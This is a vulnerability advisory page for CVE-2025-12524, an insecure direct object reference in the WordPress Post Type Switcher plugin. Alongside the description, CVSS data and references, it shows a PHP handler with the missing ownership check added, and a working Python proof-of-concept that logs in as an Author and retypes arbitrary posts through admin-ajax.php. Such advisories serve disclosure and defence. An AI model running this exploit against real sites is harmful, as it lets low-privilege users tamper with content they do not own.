Security Vulnerability Report
CVE-2025-12524 CVSS 5.4 MEDIUM


Published: 2025-11-18 07:15:44
Last Modified: 2026-04-15 00:35:42

Description

The Post Type Switcher plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 4.0.0 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to modify the post type of arbitrary posts and pages they do not own, including those created by administrators, which can lead to site disruption, broken navigation, and SEO impact.
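Added illustration, not the plugin's own code (the page does not show it): a hypothetical WordPress admin-ajax handler that switches a post's type, written with the per-object authorization this CVE reports as missing. The hook name, nonce action and request parameter names are placeholders.

```php
<?php
// Hypothetical handler (hook name and nonce action are placeholders).
add_action( 'wp_ajax_example_switch_post_type', 'example_switch_post_type' );

function example_switch_post_type() {
    // CSRF protection for the AJAX endpoint.
    check_ajax_referer( 'example_switch_post_type', 'nonce' );

    $post_id  = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
    $new_type = isset( $_POST['new_post_type'] ) ? sanitize_key( $_POST['new_post_type'] ) : '';

    $post = $post_id ? get_post( $post_id ) : null;
    if ( ! $post ) {
        wp_send_json_error( 'unknown post', 404 );
    }

    // Object-level check on the user-controlled key: the caller must be allowed
    // to edit *this* post. For posts owned by someone else the 'edit_post' meta
    // capability maps to edit_others_posts, which Authors do not have, so an
    // Author cannot retype an administrator's post.
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // The destination type must exist and the caller must be allowed to
    // publish content of that type (Authors, for example, cannot publish pages).
    $pto = get_post_type_object( $new_type );
    if ( ! $pto || ! current_user_can( $pto->cap->publish_posts ) ) {
        wp_send_json_error( 'post type not allowed', 403 );
    }

    $result = wp_update_post( array( 'ID' => $post_id, 'post_type' => $new_type ), true );
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( $result->get_error_message(), 500 );
    }
    wp_send_json_success( array( 'post_id' => $post_id, 'post_type' => $new_type ) );
}
```

Without the `current_user_can( 'edit_post', $post_id )` check the handler trusts `post_id` as-is, which is the CWE-639 pattern the description refers to.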

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No CPE configuration data is available for this CVE. The affected product is Post Type Switcher <= 4.0.0.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-12524 PoC - Post Type Switcher IDOR Vulnerability
# Target: WordPress site with Post Type Switcher plugin <= 4.0.0


def exploit_post_type_switcher(target_url, username, password, target_post_id, new_post_type):
    """
    Exploit IDOR vulnerability in Post Type Switcher plugin

    Args:
        target_url: Base URL of WordPress site
        username: WordPress username (Author level or higher)
        password: WordPress password
        target_post_id: ID of post to modify (can be any post, even admin's)
        new_post_type: Target post type (e.g., 'page', 'attachment')
    """
    session = requests.Session()

    # Step 1: Login to WordPress
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }
    response = session.post(login_url, data=login_data, allow_redirects=True)
    if 'wordpress_logged_in' not in str(session.cookies):
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Step 2: Exploit IDOR - Change post type of arbitrary post
    admin_url = f"{target_url}/wp-admin/admin-ajax.php"
    exploit_data = {
        'action': 'pts_switch_post_type',
        'post_id': target_post_id,  # IDOR: No ownership check
        'new_post_type': new_post_type  # Attacker controlled
    }
    response = session.post(admin_url, data=exploit_data)
    if response.status_code == 200:
        print(f"[+] Post {target_post_id} type changed to {new_post_type}")
        return True
    else:
        print("[-] Exploitation failed")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 6:
        print("Usage: python cve-2025-12524.py <target_url> <username> <password> <post_id> <new_type>")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    post_id = sys.argv[4]
    new_type = sys.argv[5]
    exploit_post_type_switcher(target, user, pwd, post_id, new_type)

Weakness

CWE-639: Authorization Bypass Through User-Controlled Key

References

https://cwe.mitre.org/data/definitions/639.html
https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/
https://plugins.trac.wordpress.org/browser/post-type-switcher/tags/4.0.0/post-type-switcher.php#L469
https://plugins.trac.wordpress.org/browser/post-type-switcher/tags/4.0.0/post-type-switcher.php#L486
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3391983%40post-type-switcher%2Ftrunk&old=3331072%40post-type-switcher%2Ftrunk&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/d875514c-c7d3-4236-842b-6e772048448d?source=cve

Record Status

NVD vulnerability status: Deferred. The CVSS 3.1 metric above is a secondary (non-NVD) score with exploitability sub-score 2.8 and impact sub-score 2.5.